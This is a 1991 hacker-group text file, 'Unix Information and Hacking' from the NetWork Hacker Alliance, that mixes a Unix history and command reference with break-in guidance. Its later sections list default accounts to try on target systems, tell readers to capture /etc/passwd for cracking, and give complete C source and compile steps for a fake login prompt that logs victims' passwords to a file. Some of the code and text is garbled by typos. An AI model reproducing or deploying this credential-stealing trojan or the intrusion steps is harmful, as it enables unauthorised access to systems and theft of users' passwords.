___     ___     ___     ___     ___________
           |   \   |   |\  |   |\  |   |\  |           |\
           |    \  |   | | |   | | |   | | |    ___    | |
           |     \ |   | | |   |_|_|   | | |   |\ _|   | |
           |      \|   | | |           | | |   |_|_|   | |
           |   |\      | | |    ___    | | |    ___    | |
           |   | \     | | |   |\ _|   | | |   |\ _|   | |
           |   | |\    | | |   | | |   | | |   | | |   | |
           |   | | |   | | |   | | |   | | |   | | |   | |
           |___| | |___| | |___| | |___| | |___| | |___| |
            \___\|  \___\|  \___\|  \___\|  \___\|  \___\|



           - A Production of the NetWork Hacker Alliance INC -


               PreZidents:Inphiniti & Code of Honor & Cobra

                      NHA Member Boards Listing
                      +=+=+=+=+=+=+=+=+=+=+=+=+
    +---------------------+---------------+-------------+---------+
    | Inphiniti's Edge    | 216-662-5115  | NHA *WHQ*   | NoT     |
    | Project Phusion     | 301-365-9249  | NHA Node 1  | NoT     |
    | Realm of Chaos      | 516-466-8259  | NHA Node 2  | Ex-NASTY|
    +---------------------+---------------+-------------+---------+


         NHA is now accepting applications.. If you are intrested
         and knowledgable in the Hacking of Networks and Phreaking
         etc, please call your fine H/p bbs system and download
         'NHA-APP.TXT' and upload it to Inphiniti's Edge.

                        +--------------------------+
                        |        -- NHA --         |
                        | NetWork Hackers Alliance |
                        +--------------------------+

                                 Presents

             Issue 2 : "Unix Information and Hacking"

                          Compiled by Inphiniti & Cobra
                            Edited by Inphiniti & Cobra
 ---
 AXiS & NHA have merged as of 06/30/91 for the better of H/P in America.
 ---

 ---
 Index

 I.    Introduction
 II.   History of UNIX
 III.  Unix Portability (other names for Unix)
 IV.   Frequently Used Commands (explained in detail)
 V.    Unix Editors (explained in detial)
 VI    Standard Unix Utilities
 VII.  UNIX Default Accounts
 VIII. UNIX Password Attacker
 IX.    Closing Remarks
 ---

+-----------------+
| I. Introduction |
+-----------------+

             What is an Operating System?

   UNIX is a modern day operating system.  But, what is an operating system?
 One definition of an operating system is:

   "the programs of a digital computer system which, together with the
characteristics of the computer system, form the basis of the various
operational modes of the digital computer system and especially those
which control and supervise the processing of programs."

   This compact and comprehensive description assumes the understanding of
some concepts.  The "digital computer system" is the hardware. These are the
physical components of the computer which can be touched.  Thirty years ago
this description would have been sufficient.  Today addicitonal concepts are
required.  Besides the "body", a computer system must have a "soul".  Since
a "soul" must be immaterial, it can only consist of software in a computer.
This software is the operating system.

 Therefore, the characteristics, better yet the hardware characteristics of
the computer system, together with the operating system form the basis of the
processing capabilities.  The operating system does not include all the
software in a computer.  This is the software which permites the user of the
system to execute the applications software specifically written to be used
with that operating system.  The user of a modern computer system is no
longer confronted by the hardware, but with the operating system such as UNIX.

   From this viewpoint of the user, there are three basic operating modes

  o  Batch Processing
  o  Conversational (or interactive) mode
  o  Real-time processing

 Batch processing originated during the time when executable programs were
read on a card reader in the form of a punched card dec, consisting of
control statements and the actual program..  The punched cards have now
disappeared - at best they can still be found as scraps for notes - but the
concept and the operating mode remains.

    Batch jobs

A barch job must be defined completely and in the proper sequence. The ]
control statements are usually stored in a file.  One of these statements calls
the program to be executed  Several programs can be initiiated within a batch
job.  However, all required operating devices such as disck storage, magnetic
tape storage, printer, plotter, etc. must be requested from inside the job.
No calls to the operating system are permitted since they are not answered.

       Unix and MS-DOS,CP/M or OS/2

UNIX is the oldest of the three systems, even though it has been discussed
only in the last few yeards.  CP/M and MS-DOS are oriented strongly toweds
the main features if UNIX.  The newer versions of MS-DOS resemble UNIX
very much.  Even the command syntax is very similar  The largest step in
the direction of UNIX came with DOS Version 2.0.

   Viewed from the users perspectivem the file systems of UNIX and DOS resemble
   earch other alot.  Both orginate in a root are structured hierarchically
   (like a tree).  Directories permit the user to retain an overview.  Besides
   the common files and directories, UNIX also knows an additional type, the
   device file.  Devide files provide an interface to the physical devices
   which are addressed just like an ordinart file.  Special systems call for
   control of the peripherals and are therefore not required.

Internally a UNIX file differs from a CO/M or DOS file. The orientation
towards the record oand bloack structure of a disk has been dropped.  UNIX
recoqnizes only blocks which contain byte chains.  The type of file does
not make any difference to UNIX, since it is only a concern of the
application program using the file.

+---------------------+
| II. History of Unix |
+---------------------+

   The history of UNIX begain in 1969 at Bell Labortatories, which is part
   of AT&T.  Kennth Thompson developed an operating system writtern in
   DEC PDP-7 assembler code for the "Soace Travel" project.  He called it
   UNIX.  The names was derived from the preceding operating system
   Multics which was less conservative in the use of scare computer
   resources.  UNIX was at first a single user variant of Multics.

 In 1971 UNIS was implemented again in assembler code on ther more powerful
 computers of the PDP-11 series.  To become more independant from another
 change in hardware, Thompson planned a new implementation in a higher level
 language.  He developed the B language from BCPL in 1970, but this language
 did not prove powerful enough.

After Dennis Ritchie, also a Bell, created the C language, UNIX was
rewritten almost completely in this higher level language by 1073. By
utilizing the advantages of C, UNIX became capable of handling multiusers
and multi-tasking.  UNIX was then machine independent and the start signal
for its rapid distribution was given.  At that time, Version 5 was still
being distributed to American universites free of chare for use in research
and education.  Berkeley University in particular developed UNIX further.

The real triumph begain in 1975 with Version 6.  AT&T granted source
licenses to intrested companies, but without support.  From this
release, derivatives of UNIX were created with spilt away from the main
development.

   Version 7 of UNIX appeard about the same time as the first 16-bit
   microprocessors.  This is the version onwhich most of todays Unix
   derivatives are based.  A third branch also developed, which is
   characterizedmost by the Microsoft product XENIX.

   Since 1983 AT&T has tried to bring the various development streams
   together again.  Training, documentation and other support is
   being offered.  The external sign is a new number series know as System
   V.

+------------------------+
|  III. Unix Portability |
+------------------------+

   System Name     Manufacturer
   -----------     ------------
   Aix             IBM
   bsd             University of California at Berkeley
   Coherent        Mark Williams Co.
   Cromix          Cromemco
   Edition VII     Perkin-Elmer
   EUNIX           Electronic Info Systems, INC
   IDRIS           Whitesmith Ltd.
   IS/1            Interactive Systems, INC
   IS/5            Interactive Systems, INC
   JOS             CRDS
   MUNIX           PCS
   OS-1            Software Labs
   SINIX           Siemens
   Unica           Knowlogy
   UTS             Amdahl
   UNIX            Nixdorf
   UX              Hwelett Packard
   VENIX           Ventur Com Ulnc.
   XENIX           Microsoft Co.
   ZEUS            Zilog

+-------------------------------+
| IV. Frequently Used Commands  |
+-------------------------------+


    Name: CAL
    Syntax:      cal [MM] yyyy
    Function: Creates calendar excerpts.
    Options: None

    Name: CANCEL
    Syntax: cancel [reqiest-id ...] [printer ...]
    Function: Print reuest made with ld or 1pr are canceled
    Options: None

    Name: CAT
    Syntax: cat [filename]
    Function: Writes the files indicated screen
    Options: none

    Name: CLEAR
    Syntax: clear
    Function: Clears the display screen.
    Options: none

    Name: COMM
    Syntax: comm [optoms] dat1 dat2
    Function: Displays the lines common to files dat1 and dat2
    Options: -1 \
             -2  > Suppress output of the corresponding columns/lines
             -3 /

    Name: CRYPT
    Syntax: crypt [key]
    Functions: Encodes and decodes text.
    Options: None

    Name: DATE
    Systax: date [date, time]
    Functions: Outputs date and time
    Options: None

    Name: DU
    Syntax: du [option] [dat1] ...
    Functions: Returns the disk usage or block assignment o the files.
    Options: -a Block number for eache file (defult)
             -s Only the total number of blocks is indicated

    Name: ECHO
    Syntax: echo [arguments] [\character]
    Function: Output of commentary in shell procedures.
    Options: System dependant.

    Name: FILE
    Syntax: file [options] file1 ...
    Function: Attempts to determine the specified files class.
    Options: Machine dependant.

    Name: GREP
    Syntax: grep [options] expressions [file1] ...
    Function: Searched the specified files for text patterns which
             where indicated.
    Options: -b Include Bloack numbers
             -c Count number of matching lines
             -f file Searches ex[ression is in the indicated file and not
                     in the arguement.
             -h No filename in the output line
             -n Output line number in every hit line
             -s No output, only status for procedures
                         0 = hit
                         1 = not hit
                         2 = syntax error
             -v Inversion of the command
             -y No distinction made between upper and lower case letters

    Name: HEAD
    Syntax: head [option] [file1] ...
    Function: The first N lines of stdin, or the files indicated
    Options: -n Indicates the numbner of lines from the beginning of the
                file.

    Name: LOGIN
    Syntax: login NAME
    Function: Logs new users on the system and removes old users.
    Options: None

    Name: LP
    Syntax: lp [options] [file1] ...
    Function: Insterts a print request ino the wait quee of the spool
              system.
    Options: -c Creates a temporary Copy file
             -m After print output, a message is sent by mail
                to the orginator
             -r remove file after insertion of a temporary copy into
                waiting queue

    Name: LPSTAT
    Syntax: lpstat [options] [request...]
    Function: Provides information for the spool system, including
              the current status of th print queue
    Options: -u [list]  oputputs the status of all print requests for
                        users in the list specified, each sperarated by
                        a comma.

    Name: MORE & PG
    Syntax: more [options] [file1] ...
            pg [options] [file1] ...
    Function: Display ready preparation of output with user controls
              for ease of viewing.
    Options: -l returs a disply ready list

    Name: PASSWD
    Syntax: passwd [user-name]
    Function: Change or define a new password
    Options: None

    Name: PR
    Syntax: pr [options] [file1] ...
    Function: Prepates files for printing.
    Options: -h     following textis output as header.
             -l[n]  Lines per page
             -n     n column output
             -n[nz] Line numbering
                  n = Number Size
                  z Dividing charaters between line numbers and content
             -o[n]  n charaters spaces at the left border
             -p[n]  After n pages, wait so that baper can be changed
             -t     Suppresses title, line numbers and date.
             -w[n]  Page width in charaters.

    Name: PS
    Syntax: ps [options] [process1 ...] [user1 ...]
    Function: Gives status information about active processes.
    Options: -a  All interactive processes.
             -e  All process for all users.
             -f  Complete information list
             -l  long form of the information list.
             -u user   all process for the indicated users.

    Name: SORT
    syntax: sort [options] [+pos1] [-pos2] [file1] ...
    Function. Sorts the lines of all files indicated according to
              the ascii character set.
    Options: -b     Ignore blanks and tab characters at the begining
                    of the file.
             -d     Consider only alphanumeric characters and blanks.
             -f     Treat uppercase letters as lowercase
             -r     Sort in revers order.
             -t [c] Dividing character c, may not be a space

    Name: SPLIT
    Syntax: split [-n] [file [name]]
    Function: Splits the indicated file into parts of n lines each.
    Option: -n  Number of lines for each partial file.

    Name: TAIL
    Syntax: tail [n [units]] [file1 ...]
    Functions: Copies the named file to stdout, beginning at the
               designated postion within the file.
    Options: None

    Name: TIME
    Syntax: time [command]
    Function: Returns the execution time of a command or program with
              actual delays in seconds.
    Options: None

    Name: WC
    Syntax: wc [options] [file1] ...
    Function: Counts lines, words and/or charaters in the indicated file
    Options: -l   counts only lines
             -w   counts only words
             -c   counts only characters

    Name: WHO
    syntax: who
    Function: Returns information about current users, user ids, terminals
              and start of session.
    Options: None

+-----------------+
| V. Unix Editors |
+-----------------+

There are three basic editors in the unix environment.  Some systems have
other non-portable editors but there are three basic ones.

ed:
  - line oriented
  - interactive

sed:
  - line oriented
  - not interactive
  - for batch processing

vi:
  - most powerful UNIX editor
  - interactive
  - full screen capability

  -- ED Editor Command Summary --

   syntax: ed [-] [-x] [file]

   Commands
   --------
   a        append
   i        insert
   c        change
   w [file] write to [file]
   .        current line
   $        last line
   n        Specifir line number n
   +n       Go ahead N lines
   -n       Go back N lines
   d        delete
   e file   Reads file into current file
   f        outputs name of processed files
   j        join
   l        list
   p        print
   r file   read and insserrs specified file behind the indicated buffer
   m [line] move to line #
   t [line] transfer to line #
   u        undo
   q        quit
   !        executes the shell command


  -- SED Editor Command Summary --

  Syntax: sed [-n] [-e script] [-f cmd_file] [input_file ...]

  Options: -e  sed command can be indicated directly
           -f  sed command are read from specifierd command file
           -n  suppresses the standard output


  -- VI Editor Command Summary --

  a  append
  i  insert
  o  open
esc  to exit insert mode
  w  write file
  q  to quit
  j  move down one line
  k  move up one line

+-----------------------------+
| VI. Standard Unix Utilities |
+-----------------------------+

  (Please Note: When entering this commands in UNIX you type in lower case)

 ACCEPT        Permits spooling request for printer

 ADB           Absolute debugger

 AR            Maintains portable archives and libaries

 AS            Assembler

 AT            Executes commands at a later time

 AWK           Pattern scanning and processing language

 BANNER        Makes text banners

 BASENAME      Outputs filename from path name

 BATCH   Executes commands at a later time

 BC   Desktop calculator with programming constuctions

 BDIFF   Compares two large files

 BFS   Big file scanner

 CAL   Outputs a Calander

 CALENDAR  Appointment scheduler

 CANCEL  Cancels previous spool requests

 CAT   COncatenates and prints files

 CC   C Language compiler

 CD   Changed current work directory

 CHGRP   Changes group ownership of file or directory

 CHMOD   Changes file access permission

 CHOWN   Changes file ownership

 CMP   Compares two files

 COL   Filters revers line feeds

 COMM   Selects or rejects lines common to two sorted files

 CP   Copies files

 COIP   Copies files archives in and out

 CPP   C language preprocessor

 CRYPT   Encodes and Decodes text

 CSPLIT     Splits files based on pattern matching

 CT   Spawns a getty process to a remote terminal

 CTRACE  Traces C program execution

 CU        Calls another UNIX system

 CUT   Cuts out selected fields of each line of a file

 CREF    Generates C program cross-reference listing

 DATE   Sets or prints the current date

 DC    Desktop calculator

 DD   Performs file trasnformations

 DEROFF    Removes formatting commands from file

 DF    Displays free space in file system

 DIFF          Compares two files

 DIFF3   Compares three files

 DIRCMP  Compares directories

 DIRNAME  Outputs the path from a path name

 DIS    Object file disassembler

 DISABLE   Disables spooling on printer

 DU    Summarizes Disk usage

 ECHO   Echoes arguments

 ED   Line-oriented editor

 EDIT   Line-oriented editor

 ENABLE  Enables spooling on a printer

 ENV   Sets environment for command execution

 EXPR    Evaluates arguments as an expression

 FACTOR  Obtains prime factors of a number

 FGREP   Searchs a file for a character string

 FILE   Determines file type

 FIND   Searches for files

 FSDB   Debugs damaged file systems

 GED   Graphical Editor

 GETOPTS  Phrase command line options

 GLOSSARY  Displays definitions of UNIX system terms and symbols

 GRAPH   Draws a graph

 GRAPHICS  Accesses graphical and numerical commands

 GREEK   Selects terminal filter

 GREP   Selects lines of a file based on a pattern matching

 GUTIL   Graphical utilties

 HELP    Provides on-line help on UNIX commands

 HELPADM     Makes changes to the Help Facility Database

 ID     Outputs user and group ID's and names

 IPCS   Reports interprocess communication ffacilities status

 JOIN   Joins two tabular data files

 KILL    Terminates or signals a process

 LINE      Copies a line from standard input to output

 LN    Links file names

 LOGIN   Admits autorized users to system

 LOGNAME  Outputs the user's login name

 LP   Line printer spooler

 LPR   Line printer spooler

 LPADMIN   Configes the 1p spooling system

 LPSTAT   Printer spooling status information

 LS   Lists contents of directories

 M4   Macro processor

 MAIL     Sends and recieves UNIX mail

 MAILX   Extended Mail Facility

 MAKE   Regenerates groups of programs

 MAKEKEY  Regenerates encryption key

 MAN    Prints on-line manual entries

 MESG   Permits or denies messages

 MKDIR   Makes a Directory

 MKFS   Creates a file system on disk

 MKNOD   Creates a directory entry for a special file

 MOUNT   Mounts a file system

 MV   Moves files

 MVDIR   Moves a directory

 NEWFORM  Reformats lines of a text file

 NEWGRP  Changes active group membership

 NEWS   Prints News commands

 NICE   Runs a program at reduced priority

 NL   Line numbering filter

 NOHUP   Runs a command immune from hang-ups and quits

 NROFF   Text formatter

 OD   Outputs an octal dump of a file

 PACK   Packs files

 PASSWD  Changes online users password

 PASTE   Merge lines of files

 PCAT   Concatenates packed files

 PG   Browse file contents on terminal screen

 PR   Print files

 PS   Outputs process status

 PWD   Prints the name of the current working directory

 RM   Removes files

 RMDIR   Removes directories

 RSH   Restricted UNIX system shell

 SAG   Outputs system activity graph

 SAR    Outputs system activity report

 SCAT   Concatenates and prints files

 SDB           Symbolic debugger

 SDIFF   Compares two files

 SED   Stream Editor

 SH   The Unix system shell

 SHL   Shell layer manager

 SHUTDOWN   Shuts down the system

 SLEEP   Suppends execution for a time interval

 SORT   Sorts and merges files

 SPLIT   Splits a file

 STARTER  Displays UNIX information for new users

 STRIP   Removres symbol table information from object file

 STTY   Sets ternubak characterustics

 SU   Tempararily changes the user-ID

 SUM   Outputs checksum and block count for file

 SYNC   Writes disk buffers to disk

 SYSADM  Menu Driven system administration utility

 TABS   Srets tabs on a terminal

 TAIL   Outputs the last oart of a file

 TAR   Tape file archiver

 TEE   Pipe fitter

 TEST   Evaluates conditions

 TIME   Times command execution

 TOUCH   Updates access and modifications times of a file

 TR   Character translation fiflter

 TROFF   Phototypesetter text formatter

 TRUE   Returns true value

 TTY   Outputs name of a terminal

 UNMASK  Setsr file creation mode mask

 UMOUNT  Dismounts a file system

 UNAME   Outputs the name of the current UNIX system

 UNIQ    Outputs a file with unique lines

 UNITS   Performs units conversions

 UNPACK  Unpacks packed files

 USAGE   Displays information about command usage

 UUCP   Copies files between UNIX systems

 UULOG   Outputs UUCP log information

 UUNAME   Outputs UUCP names of known systems

 UUSTAT  Outputs UUCP status information

 UUX   Executes a command on a remote UNIX system

 VI   Full screen editor

 WAIT   Waites for completeion of background processing

 WALL   Sends a message to all users

 WC   Outputs line, word and character counts for files

 WHO   Outpurts information on current users

 WRITE   Sends messages to another user

 XARGS   Constructs an argument list and executes a command

 YACC   Compiler-generating tool


+----------------------------+
| VII. Unix Defualt Accounts |
+----------------------------+

  Super User Default Accounts

  ROOT
  MAKESYST
  MOUNTSYS
  UMUNTFSYS
  CHECKSYS
  FSYS

  Regular User Defaults

  DAEMON
  DAEMONx  (x value is 1 thru 9)
  LP

  Unix Systems that have already been hacked try..

  ROCUSER
  IEx      (x value is 1 thru 4)
  ANONYMOUS
  GUEST


   If it askes for a password I doubt you will get in but always try the
   account name.

   Once in type this (at the waiting prompt usually a # or $)

   cd /ETC     (UNIX root directory)
   cat PASSWD  (UNIX password file)  <--- Capture this if you can get it
      then find a UNIX hacker on your local H/P board and let it run!

+------------------------------+
| VIII. Unix Password Attacker |
+------------------------------+


/* this is what a 'C' comment looks like.  You can leave them out. */

/* #define's are like macros you can use for configuration. */

#define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"

/* The above string should be made to look like the message that your
* system prints when ready.  Each \n represents a carriage return.
*/

#define LOGIN  "login: "

/* The above is the login prompt.  You shouldn't have to change it
* unless you're running some strange version of UNIX.
*/

#define PASSWORD "password:"

/* The above is the password prompt.  You shouldn't have to change
* it, either.
*/

#define WAIT 2

/* The numerical value assigned to WAIT is the delay you get after
* "password:" and before "login incorrect."  Change it (0 = almost
* no delay, 5 = LONG delay) so it looks like your system's delay.
* realism is the key here - we don't want our target to become
* suspicious.
*/


#define INCORRECT "Login incorrect.\n"

/* Change the above so it is what your system says when an incorrect
* login is given.  You shouldn't have to change it.
*/

#define FILENAME "stuff"

/* FILENAME is the name of the file that the hacked passwords will
* be put into automatically.  'stuff' is a perfectly good name.
*/

/* Don't change the rest of the program unless there is a need to
* and you know 'C'.
*/

#include <curses.h>
#include <signal.h>
int stop();

main()
{
char name[10], password[10];
int i;
FILE *fp, *fopen();
signal(SIGINT,stop);
initscr();
printf(SYSTEM);
printf(LOGIN);
scanf("%[^\n]",name);
getchar();
noecho();
printf(PASSWORD);
scanf("%[^\n]",password);
printf("\n");
getchar();
echo();
sleep(WAIT);


if ( ( fp = fopen(FILENAME,"a") )  != NULL ) {
#fprintf(fp,"login %s has password %s\n",name,password);
#fclose(fp);
#}

printf(INCORRECT);
endwin();
}

stop()
{
endwin();
exit(0);
}

-- END --

** this is how you compile it

cc horse.c -lcurses -ltermcap
mv a.out horse
source trap            (again, don't type the %)



+---------------------+
| IX. Closing Remarks |
+---------------------+


  Well this is the end of Unix Hacking Volume I.  You should have a firm
  awareness with UNIX now and I hope you continue to grow and wait for
  our UNIX Hacking Voulume II which will contains holes into the unix
  system..

  NHA nor the Author(s) of this file are responisble for any use that
  may come into play by the reader. This is meant for education purposes
  only not for any illegal activities.

            ___     ___     ___     ___     ___________
           |   \   |   |\  |   |\  |   |\  |           |\
           |    \  |   | | |   | | |   | | |    ___    | |
           |     \ |   | | |   |_|_|   | | |   |\ _|   | |
           |      \|   | | |           | | |   |_|_|   | |
           |   |\      | | |    ___    | | |    ___    | |
           |   | \     | | |   |\ _|   | | |   |\ _|   | |
           |   | |\    | | |   | | |   | | |   | | |   | |
           |   | | |   | | |   | | |   | | |   | | |   | |
           |___| | |___| | |___| | |___| | |___| | |___| |
            \___\|  \___\|  \___\|  \___\|  \___\|  \___\|

           - A Production of the NetWork Hacker Alliance INC -

               PreZidents:Inphiniti & Code of Honor & Cobra

                      NHA Member Boards Listing
                      +=+=+=+=+=+=+=+=+=+=+=+=+
    +---------------------+---------------+-------------+---------+
    | Inphiniti's Edge    | 216-662-5115  | NHA *WHQ*   | NoT     |
    | Project Phusion     | 301-365-9249  | NHA Node 1  | NoT     |
    | Realm of Chaos      | 516-466-8259  | NHA Node 2  | Ex-NASTY|
    +---------------------+---------------+-------------+---------+





         NHA is now accepting applications.. If you are intrested
         and knowledgable in the Hacking of Networks and Phreaking
         etc, please call your fine H/p bbs system and download
         'NHA-APP.TXT' and upload it to Inphiniti's Edge.

                 With this file we welcome Keener into NHA.


                N.H.A.  The Future of Hacking and Phreaking


                In the works....

                           CBI Advanced Usage
                           TRW Advanced Usage
                           Milton.Edu Advanced Usage

                          more to come from N.H.A.